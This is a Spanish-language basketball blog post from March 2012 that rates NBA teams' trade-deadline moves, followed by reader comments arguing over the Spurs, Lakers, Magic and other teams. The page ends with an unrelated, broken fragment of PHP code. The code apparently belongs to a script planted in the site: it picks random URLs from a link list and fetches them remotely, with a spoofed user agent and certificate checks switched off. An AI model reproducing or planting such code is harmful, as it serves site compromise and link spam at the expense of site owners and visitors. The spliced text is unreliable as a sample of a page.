Potencial tras el día “D”espués

20 de March de 2012 por jose a ramirez

Decepción. Esa es la palabra más escuchada después del cierre de mercado. No hubo grandes trades, pero sí alguno que, aunque no cambiará la condición de favorito de nadie, puede dar un plus extra a algún equipo.

No voy a enumerar los traspasos que ya todos conocemos. Lo que haré será darles una vuelta de tuerca después de un fin de semana de haberlos masticado y digerido, y analizar ya en frío el hipotético potencial con el que los conjuntos involucrados afrontan la recta final de campaña y los play-offs.

Para ello valoraré del 5 al 10 los movimientos de cada franquicia y abriremos un debate para ver quién consideramos que ha dado un paso adelante y quién hacia atrás. Aclaro que me baso en estos medidores pensando sólo en esta temporada. Nada de futuro, sólo presente y opciones de gloria.

SAN ANTONIO SPURS –  8’5. Un único movimiento en los Spurs que sirve para colocarlos como el equipo que más tiene a ganar en teoría de aquí al final. Darle largas al paquete de Richard Jefferson y apostar por Stephen Jackson le hacen merecedor de ello. Anotación, experiencia, defensa y ¡sí!, algo de locura, pero la mano de Popovich lo centrará para que los Spurs den un salto de calidad enorme. No olviden que Capitán Jack ya militó en San Antonio y con anillo de regalo. ¿Será esta vez suficiente para ser finalistas? Son los grandes tapados y, porque no decirlo, los grandes olvidados.

MILWAUKEE BUCKS – 8. Muy buena decisión de presente la de librarse de un Andrew Bogut lesionado todo el año y de un Stephen Jackson al que ya le sacarán provecho en Texas. La adquisición de Monta Ellis les da ese plus de magia, talento y puntos que hasta ahora no tenían en un equipo muy rocoso y sólido. El único pero: que sólo ocho pueden entrar en play-offs. Lucharán a brazo partido con los Knicks. Todos no pueden entrar y uno se quedará fuera. Sin Ellis no podrían ni intentarlo.

L.A CLIPPERS – 8. Les hacía falta un escolta y obtienen quizá a uno de los mejores de los que se habían barajado. Joven, anárquico a veces y gran anotador, si se adapta a la dinámica del equipo no creo que llegue a suplir a Chauncey Billups, pero aportará buena parte de las opciones que habían perdido tras la lesión del ex-Pistons. Eran mis favoritos del oeste este año, lástima lo de Mr. Big Shoot…. Nick Young hará su ausencia más llevadera.

INDIANA PACERS – 7. Otro equipo que andaba algo cojo en los puestos exteriores. El brasileño Leandro Barbosa aportará saber estar, profundidad, anotación y velocidad en un conjunto tan defensivo como el de Frank Vogel.

L.A LAKERS – 6’5. Demasiado sobrevalorados los movimientos del equipo angelino. Me explico. A priori parece que mejoran levemente, lo que ocurre es que en vez de Derek Fisher quien debería haber salido es Blake. Estamos de acuerdo en que Ramon Sessions mejora a los 2 pero cuando la bola queme en play-offs ¿meterá Sessions lo que siempre ha hecho Fisher? NO. A mí no me engañan. Movimientos de cara a la galería en el puesto de base y Jordan Hill como interior suplente es muy poco bagaje. Aunque este último lo tiene fácil para mejorar lo que hay… Conclusión, quizá lo que es mejor en regular season no lo será y no bastará para que mejoren sus opciones en play-offs.

DENVER NUGGETS – 6. Espinoso asunto valorar el desprenderse de Nene Hilario y recibir a cambio a Javale McGee. A favor de ellos he de decir que al ser un equipo coral no dependen excesivamente de ningún jugador en particular, y McGee puede aportar la altura e intimidación que no tenía el brasileño. Sobre todo en play-offs, en los que Denver estos últimos años no ha tenido un buen jugador de esa envergadura, y a partidos a cara de perro la pintura puede ser decisiva. Es el traspaso con más incógnitas, aunque si me tengo que mojar, y pese a la calidad y anotación de Nene, yo les doy un voto de confianza. Aunque si pusiese un jurado y un tribunal como símil, diría que la prueba para inclinarme es tan solo circunstancial.

HOUSTON ROCKETS –  5. Se han desecho de desechos (valga la redundancia) y podría ser interesante ver la aportación de Marcus Camby, más rebotes y profundidad en la pintura.

ORLANDO MAGIC – 5.  ¡SÍ!, se quedan con Dwight Howard, pero no han conseguido absolutamente nada más que un poco de tranquilidad y confianza en ellos mismos que no les valdrá para superar el techo donde se espera que palmen.

Para ir cerrando, mencionaré que Sam Young puede ser aprovechable en Philadelphia y que a Portland, aunque esté bien situado en la tabla, el mejor favor que les puedo hacer es no meter el dedo en la llaga y decir que han echado la temporada por el wáter. Habrá que ver en que equipos acaban jugando los jugadores que rescindirán contrato como Fisher, Nocioni, Kaman, Diaw, etc… pueden darle un salto de calidad a cualquiera.

Me interesa mucho la opinión de ustedes y espero que con nuestras opiniones, entre todos, lo veamos todo un poco más claro.

Así cierro el serial rumores esperando que las tres partes hayan sido de vuestro agrado y os hayáis divertido, que a fin de cuentas es lo más importante. Volveré con mas artículos de otra índole espero que pronto, y mientras tanto disfrutemos de nuestra pasión. ¡I LOVE THIS GAME¡.

Comenta

24 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Chandler renovó por Nuggets, 37 kilazos por 5 años, será el titular ahora que Gallinari se lesionó de nuevo. Es un buen movimiento pero no se si merecia un contrato tan largo este jugador, a ver como vuelve de China.

      Citar

  2. Txusma dice:
    #2

    El Madrid ya puede preparar la siguiente temporada contando con Rudy.

      Citar

  3. Sancho88 dice:
    #3

    Nada, ninguno de estos trades mejora sustancialmente a los equipos que los han hecho. Washington gana algo de seriedad, y Denver algo de intimidación, pero no veo que ninguno de los dos mejore. Ni Wizards van a dejar de ser uno de los peores equipos de la liga, ni Nuggets van a aspirar a segunda ronda.

    S-Jax. Tendrá que integrarse en un mecanismo y un engranaje casi perfecto, en un equipo con mayúsculas. Ahora mismo, no le veo haciéndolo. Creo que está pasado de todo y pasando de todos. No le veo integrándose bien. Talento tiene, pero compromiso… tengo muchas dudas. Tampoco veo que entre él y Jefferson un equipo como Spurs mejore como para optar al anillo, por ejemplo. Porque, efectivamente, Spurs son los grandes tapados este año, y todo dependerá de si aguantan tanto ritmo y si mantienen a partir de ahora a sus tres piezas básicas sanas. Ofensivamente, tienen el mejor juego interior de la liga, tienen al base que, en mi opinión, está jugando mejor de toda la liga, y personalmente me encanta Leonard y Gary Neal, por su intensidad y sacrificio. No sé donde pude encajar Jackson en todo esto… O se implica. o dejará clarísimo que pasa de todo.

    Milwaukee han hecho la mejor jugada de todos de cara a esta misma temporada. Si Knicks o Celtics se despistan de aquí al final, que nadie dude de que los Bucks les amarrarán el octavo puesto.

    Clippers. Valorar a Nick Young dentro de unos límites. Es un individualista que en nada ayuda a la defensa angelina. Necesita tirar mucho para anotar poco. Una mierda, para ser exactos. No es lo que necesitaba Clippers. Me temo que se darán el batacazo padre en primera rondita.

    Indiana. Un poco como los Bucks, poniendo una pieza de buen valor a la rotación. No obstante, les hacía, y les hace falta, como el comer, un base. Collison está bien porque anota y tal, pero como director de orquesta es bastante mediocre. Prefiero mil veces a Hill, que es mucho más coherente y solidario con sus compañeros. Pero Barbosa les puede venir bien. Me gusta ese movimiento que han hecho.

    Y luego, lo de los Lakers ya lo he comentado. Me parece una cagada de Cavaliers, que no necesitaban haber regalado a Sessions a cambio de esos dos garrulos. Que sí, que van a remodelar el equipo y no se qué, pero eso ya lo llevan haciendo desde que se fue Lebron, no necesitaban sacarse de encima a Sessions para comerse toda la mierda que no quería nadie. No sé como alguien puede defender ese traspaso… me parece increíble.

    Magic. Bien por quedarse a Howard, le han engañado muy bien, y al menos le aguantarán un añito más. Lamentable Bass x Davis, aun unos meses después. Bass-Howard no permitirían lo que está pasando. Davis no está aportando absolutamente nada. J-Rich y Hedo en su línea, una de cal y otra de arena, y el resto muy irregular. Aunque Nelson ha crecido en las últimas semanas, un base que no es capaz de promediar 5 asistencias con Howard al lado… Conclusíón: nadie quiere a ningún jugador de los Magic que no sea Howard, pero excelente el chantaje emocional que le han hecho. Maravilloso. El tío que le haya convencido de que ese equipo aspira a algo, es todo un campeón.

    Houston Rockets. Ese equipo es como un mercadillo, especialistas en el bueno, bonito, barato, que luego miras la etiqueta y pone Dolce&Camino o Adías. Buenísima timada a los Blazers. Camby pone más seriedad en la zona, para un equipo ya de por sí muy respetable en esa parte del juego. Con Lowry+Kevin Martin, más Scola-Sammy-Camby, más Parsons-Patterson-Budinger, el equipo está perfectamente equilibrado y pueden ser un hueso en primera ronda. No digo que tengan opciones de pasar de ahí, pero sí que serán duros, como siempre. Se han quitado dos jugadores que no querían, y han traído a uno que por lo menos la dignidad la conoce como jugador, y nunca ha perdido la profesionalidad por el camino, salvo cuando se le va la olla de vez en cuando.

      Citar

  4. Sancho88 dice:
    #4

    Ayer yo vi a los Nuggets. Se le ve centrado, aunque un poco perdido como es lógico. Creo que no va a tener ningún problema en integrarse, de hecho, ayer ya se le vio bastante metido en el esquema ofensivo, sobre todo. Es un jugadorazo y les dará grandes cosas a los Nuggets.

      Citar

  5. Sancho88 dice:
    #5

    Matizo, ya que centrado y perdido y metido son sinónimos, antónimos y parece que me he vuelto loco y no sé lo que estoy diciendo

    Centrado=concentrado

    perdido= perdido en el ritmo de competición, al 60% del físico que él puede aportar en la NBA

    metido en el esquema= integrado en el equipo, se nota que se conoce a los compañeros

      Citar

  6. Sancho88 dice:
    #6

    Ah, último coment. Me olvidaba de Lee y Dragic. El cuarteto de pequeños Lowry-Dragic-Martin-Lee. Como digo, tienen el equipo muy bien perfilado, aunque de calidad no les da como para aspirar a llegar muy lejos, pero es el ejemplo de hacer bien las cosas en el despacho. Intentarán por todos los medios el Dragic-Martin-Scola por Pau. Pero Lakers no debe aceptar, a no ser que sea Lowry-Scola por Pau. Y hasta aquí comento, que si no os peto la página y acobardo a gente, que me he dado cuenta que cuando me quedo dormido salís de vuestras guaridas y comentáis y todo, jejej, es coña (obviamente no lo es, jejeje)

      Citar

  7. Txusma dice:
    #7

    Sancho88:
    Ayer yo vi a los Nuggets. Se le ve centrado, aunque un poco perdido como es lógico. Creo que no va a tener ningún problema en integrarse, de hecho, ayer ya se le vio bastante metido en el esquema ofensivo, sobre todo. Es un jugadorazo y les dará grandes cosas a los Nuggets.

    De quien estamos hablando? De Chandler?

      Citar

  8. HeiNeKeN dice:
    #8

    Txusma: De quien estamos hablando? De Chandler?

    Imagino que si, porque McGee no jugó,

      Citar

  9. Ru dice:
    #9

    Txusma:
    El Madrid ya puede preparar la siguiente temporada contando con Rudy.

    Precisamente cuando hace unos días comentaba que su futuro estaba en la NBA,llega Chandler y juega 9 minutitos,lloros de Rudy en 3,2,1…

    Si hay que valorar los movimientos de cara a esta temporada,creo que el ganador sería Milwaukee por hacerse con un anotador como Ellis a cambio de un jugador lesionado y un descarte partido tras partido,si quieren entrar en PO el ex-Warrior es un excelente herramienta.

    Pondría después a San Antonio y Lakers,y les doy más valor por lo que han empaquetado -Jefferson,Fisher(aunque aquí estoy totalmente en contra de lo que le han hecho,se merece más respeto),Walton- que realmente por los activos que han logrado.Houston también entraría en este grupo.

    A continuación Clippers e Indiana por ese orden,si bien valoro mucho más la aportación a corto plazo de Nick Young sobre la de Leandrinho.

    Y por último Denver y Orlando,puestos a valorar esta temporada.La incorporación de McGee habrá que valorarla con el tiempo,no creo que mejore en nada a su equipo respecto a Nene -a día de hoy- mientras que el paripé de Howard en Orlando…ni fu ni fa,alargar la agonía sin reforzar a tu equipo.A Orlando le daba un 0…a New Jersey un -1 porque han visto que Howard se les va de las manos,refuerzan su equipo con Gerald Wallace en un intento a la desesperada por retener a Deron,lucharán por hacer una buena campaña,lo suficiente para tener pocas opciones de que su ronda entre en el TOP 3 del próximo draft así que no entrarán en postemporada,pierden a Deron,perderán a Wallace y pierden su ronda.Un desastre.

      Citar

  10. rumbero dice:
    #10

    Txusma: De quien estamos hablando? De Chandler?

    Yo entiendo que si, por el comentario anteior de Heineken y porque McGee no jugó. Son las típicas dudas de cuando Sancho entra en trance y se pone a escribir como un condenando xD

    A mi el movimiento de Spurs me gusta bastante. No creo que S-Jax pueda aportar menos de lo que hacía Jefferson la verdad. Y sus problemas de actitud de los últimos tiempos venian más porque no se tragaban con Skiles que por irse de casinos con Walker. A ver si un par de charlas de Popovich y el nucleo viejo del equipo sirven para sacar algo bueno de él

      Citar

  11. Esteban dice:
    #11

    los wizards aprendieron la leccion que les dio esta temporada y se movieron en la direccion correcta, me explico por q

    cuando arranco esta temporada me parecia mal lo que hacian los cavs, de mantener a un jugador medio pelo y veterano como parker y otro veterano como jamision y no traspasar a varjao por algun joven, creia que estos viejitos le sacaban espacio a jovenes y a la vez impedia que se desarrollen y se hagan hombres en la nba

    por otro lado veia bien a los wizars, que salvo por lewis, tenian un roister lleno de jugadores jovenes con muchisimos minutos a dispisicion listos para estallar y crear una franquicia ganadora, a saber, wall, seraphin, booker, vasely, blatche, mcgee, young y crawford

    bueno el tiempo se encargo de no darme la razon, los veteranos de los cavs han ayudado a los jovenes a desarrollarser y ganar partidos, a no crecer en un ambiente super perdedor y a encarrilarlos de ser necesario, incluso hasta la lesion de varejao hasta podian peler por unos PO

    en cambio los wizards, erraron el camino, solo dejaron a un hombre con experiencia, y vamos que el ejemplo de LEWIS no es nada bueno (mason y turiaf ni cuentan), dejar a crios las riendas de un equipo les salio caro, todos creyendose estrellas y haciendo lo que les daba la gana fue su perdicion, UNO DE LOS PEORES ARRANQUES DE LA HISTORIA DE LA NBA, ENTRENADOR DESPEDIDO, FUTUROS ALL STAR DE CAPA SUPER CAIDA (CASO WALL)

    creo que ahora estan intentando reencontrar el rumbo, con wall, crawford, vasely, booker y seraphin tienen juventud, pero le agregaramn seriedad y una columna vertebral fuerte con nene, y tendra espacio para buscar algunos experimentados en el perimetro para que ayuden a los jovenes

    PD: necesitan un entrenador que vuelva a confiar en blatche, tiene talento, pero sobretodo un contratazo q no se lo podran vender a nadie, la mejor opcion es que intente a ser util al menos a la rotacion del equipo

      Citar

  12. Esteban dice:
    #12

    otro enorme ganador, q ni se nombra aqui, son los warriors, ahora tienen un ala pivot legitimo como lee, un alero de rol muy cumplidor si funciona bien como jefferson y un centro de poder como bogut cuando este bien
    3 buenos jugadores, y ahora todo dependera del explote de sus dos perimetrales, curry q creo que recuperara sensaciones anteiores sobretodo

    perdieron a ellis, pero vaya recambio han encontrado en thompson, en los 4 partidos que han jugado sin ellis, thompson su reemplazo ha anotado 26, 19, 17 y 17 puntos

    jugada redonda a mi entender, consiguen un pivote y la estrella que se va es reemplazada por una nueva estrella

      Citar

  13. Vader dice:
    #13

    Ojo con los Warriors que parece que cerraran a Hickson. Si Bogut vuelve sano seran un equipo de playoff en el Oeste pero de momento tengo la sensacion que los Bucks han ganado…

    Me gusta mucho tambien el cambio de los Spurs y me gusta mucho como estan jugando, lastima que Splitter no juegue más.

    Saludos

      Citar

  14. Nacho dice:
    #14

    Bueno, como no aparece Denise, lo digo yo.
    De verdad que flipo que penséis que se han movido mal en Orlando. Han cerrado a Howard por un año, que era lo primordial, ahora tienen el verano para completar el equipo. No son tan banda como pudiera parecer lo de anoche. Son muy irregulares. Y eso les mata. Pero pueden dar la sorpresa a cualquiera. Yo tendría más miedo con la primera ronda, donde debe ser obligatorio ganar, que unas hipotéticas semis de conferencia, donde no se les va a exigir nada, y se la pueden liar a cualquiera de los dos gallitos. Y ya lo han demostrado esta temporada.
    Yo creo que no han encontrado el recambio que buscaban, y ante eso es mejor esperar. Igual Hedo vuelve a hacer unos PO de la leche, y aparece el Toronto de turno que lo quiere, aunque sea porque necesita llegar al mínimo. No sé como andarán de espacio, pero si Howard podía ir libre a los Nets, no sé por qué no se puede pensar lo mismo de Deron. Yo creo que el movimiento de ahora, mantener a Howard, es bueno, y si lo completan en verano, puede ser la leche.
    Y lo digo ahora que han ganado sin Rose, y con Boozer desconocido. La gran cagada ha sido la de los Bulls, No se han movido nada, y me parecen el equipo que más depende de su estrella. Como siga con problemas Rose en PO, la llevan chunga. Carlitos me podría callar la boca si hace estos partidos hasta final de temporada, pero lo dudo. Lo de Hamilton de momento es un bluff, Deng creo que no está al nivel del pasado año, y lo de Boozer… eso sí, miras la tabla y me pueden dar de leches, pero no los veo equipo de PO. Eso es otra cosa. Doc Rivers es demasiado bueno en esas lides, y sus viejos también, y pueden aprovecharse de las lagunas de los de Chicago. E igual a Van Gundy se le aparece su libreta, y da con la tecla en PO (esto es más difícil).
    Y en LAL, duele mogollón lo de Fisher, pero ver un partido, y mirar al banquillo y no ver ni a Kapono, ni a Walton, como que ayuda, no sé, ayuda a pensar que se puede hacer algo. Hombre ya puestos no hubiese pasado nada si McRoberts también sale, pero bueno, ya será (hoy no) mañana.

      Citar

  15. Lucho dice:
    #15

    A proposito del primer comentario de Sancho, que habla sobre los Spurs.
    A mi tambien me gusta mucho Neal, y agrego a Danny Green. Me parecen sumamente validos. Son jugadores subvalorados les parece? O es que Popovich sigue sacando petroleo?

      Citar

  16. Txusma dice:
    #16

    Vader:
    Ojo con los Warriors que parece que cerraran a Hickson. Si Bogut vuelve sano seran un equipo de playoff en el Oeste pero de momento tengo la sensacion que los Bucks han ganado…

    Esta temporada no creo que vuelvan ni Bogut ni Curry y si lo hacen será para jugar los últimos partidos en plan relax. Recordar que tienen traspasada su 1ª ronda a Utah protegida TOP-7. Vamos, q se dejarán caer para no tener que enviar su 1ª ronda a los Jazz este año. Aquí no forzará nadie.
    Eso sí, de cara al año q viene, cuidadito q tienen mejor pinta que hace 1 mes más que nada pq se entrevee un cambio.

      Citar

  17. nba dice:
    #17

    Que no se diga que los Grizzlies no lo intentan …, primero fue Iverson, ahora Arenas , a ver si esta vez si les sale bien

      Citar

  18. max dice:
    #18

    A quien parece que vamos a ver de nuevo es a Gilbert Arenas. Según Sport Illustrated, ha fichado por los Grizzlies por el mínimo hasta final de temporada, unos 300.000 $.

      Citar

  19. max dice:
    #19

    Ups, no habia visto el comentario anterior de nba. De todas formas, ya les salió bien con Z-Bo y supongo que lo vuelven a intentar.

      Citar

  20. Esteban dice:
    #20

    nacho el problema del magic es que no tienen espacio en el tope nmi ahora ni en futuro, ya habiendo aplicado la anmistia a arenas, asi que no pueden volver a usarla, tienen comprometido el presente y el futuro con redick, davis, nelson, turkoglu y el propio howard, por eso no ira a orlando deron, y tampoco podran firmar agentes libres, solo disponen de la mitad de la excepcion de nivel medio

      Citar

  21. Esteban dice:
    #21

    todos dan muy perdedores a los NETS, pero yo no lo veo tan asi, se vieron en una situacion complicada, sin howard, habia que traspasar a deron rapido o hjacer alguna jugada, pues bien, creo que si bien regalan un ronda a portlnad, traer a gerald wallace no esta tan mal, es un buen jugador que podria complementar a deron y a lopez, bueno algo es algo, un equipo con deron, morrow, wallace, humpries y lopez, mas farmar, brooks y l resto en el banco, es un equipo de PO, no tan fuerte como para competir por el titulo, pero antes que nada esta bien

    por mi parte si fuera el GM de los nets, me dejaria perder todos los juegos para estar en las 3 primeras posiciones del draft y no tener que ceder mi ronda, ahi si que seria un negocio redondo

      Citar

  22. simon dice:
    #22

    Nacho respecto a tu comentario sobre los Magic me juego lo que quieras que a corto plazo ( es decir lo que le queda a Howard en Orlando ) no van a ser capaces de montar un equipo que aspire de verdad a ser campeón, como ya dije todos y cada uno de los jugadores de Orlando a excepcion de Nelson que termina el año que viene, el resto tienen contratos largos y altos y su rendimiento es mas bien pobre, por lo tanto los Magic en este trade deadline no son vencederos de nada, es pan para hoy pero hambre para mañana.

    Y respecto a lo de los Bulls de acuerdo en que debian de haber hecho algo, no obstante si no han hecho nada es pq para traer a alguien tendrían que dar a mucha gente y eso tampoco lo veo positivo para los Bulls, pues precisamente la fuerza de los Bulls es el conjunto, eso de que son el equipo que mas depende de su estrella para mi es justo lo contrario, han ganado sin su estrella a practicamente todos los aspirantes a los que se han enfrentado sin Rose, quitale a Magic ( Howard) , a Thunder ( Durant ), a Dallas ( Nowitzki ), a Heat ( Lebron ), a Lakers ( Bryant ) o a Clippers ( Paul ) y verás como su rendimiento se resiente mucho mas que el de los Bulls sin Rose ( Hablando de RS ). En PO no se si sería asi pero si algo tienen los Bulls es que son un EQUIPO.

      Citar

  23. TheDeerHunter dice:
    #23

    Gran artículo y gran reflexión. Me encantan este tipo de iniciativas que nos refrescan el blog a los más habituales.

    No voy a entrar a analizar cada movimiento. Hablaré del que más puedo aportar conocimiento de causa. Lakers.

    La baja de Fisher, sin entrar a valorar aspectos económicos ni emocionales es una baja significativa. Al contrario de lo que decía HisRoyal o todo lo que se ha dicho de él, a mí me parece aún ahora un jugador insustituible en playoffs y en los momentos más críticos. Posiblemente aun tengamos oportunidad de comprobarlo (miedito)
    Sin embargo, la adquisición de Sessions me parece buenísimma. Se necesitaba un base así… no voy a decir que Fisher lo fuera, ni de lejos. Por lo que he visto el equipo lo está notando, aunque aún no lo suficiente. Ha salido a coste asumible (que no fraude, que decían algunos, porque no será fácil económicamente renovarle)

    Lo redondo hubiera sido mantener a Fisher, largar a Blake y Walton, traer a Sessions e incluso a Beasley. Si esto hubiera sido así, en mi opinión volvían a ser máximos favoritos de inmediato. Así siguen siendo candidatos, más que favoritos. Sin embargo, en líneas generales el equipo es más potente con Sessions que con Fisher porque los Lakers necesitan más un Sessions que un Fisher en estos momentos.

      Citar

  24. M dice:
    #24

    Fisher de contrapunto de Westbrook en OKC puede ser realmente interesante 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>